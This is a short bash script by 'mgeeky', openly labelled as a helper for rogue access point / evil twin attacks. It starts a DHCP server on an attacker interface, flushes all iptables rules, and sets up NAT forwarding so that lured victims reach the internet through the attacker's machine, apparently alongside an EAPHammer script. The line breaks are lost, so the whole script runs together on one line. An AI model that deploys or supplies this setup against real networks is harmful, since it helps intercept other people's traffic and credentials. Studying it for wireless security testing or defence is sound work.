#!/bin/bash # # This script set's up a DHCP server for Rouge AP / Evil Twin # attack purposes, to make the victim actually reach out to the WAN. # # Nothing fancy, just set of needed commands. Especially handy when # used with `startEAPHammer.sh` script. # # Mariusz B. / mgeeky '18, <mb@binary-offensive.com> # if [ $# -ne 2 ]; then echo "Usage: initDhcp.sh <inputIface> <outputIface>" echo echo -e "\tinputIface - Interface upon which DHCP leases should be offered." echo -e "\toutputIfave - Interface offering access to WAN (default gateway)" exit 1 fi INP=$1 OUT=$2 ifconfig $INP up 10.0.0.1 netmask 255.255.255.0 sleep 2 if [ "$(ps -e | grep dhcpd)" == "" ]; then echo "[+] Started DHCP server." dhcpd $INP & fi # Enable NAT iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables --table nat --append POSTROUTING --out-interface $OUT -j MASQUERADE iptables --append FORWARD --in-interface $INP -j ACCEPT sysctl -w net.ipv4.ip_forward=1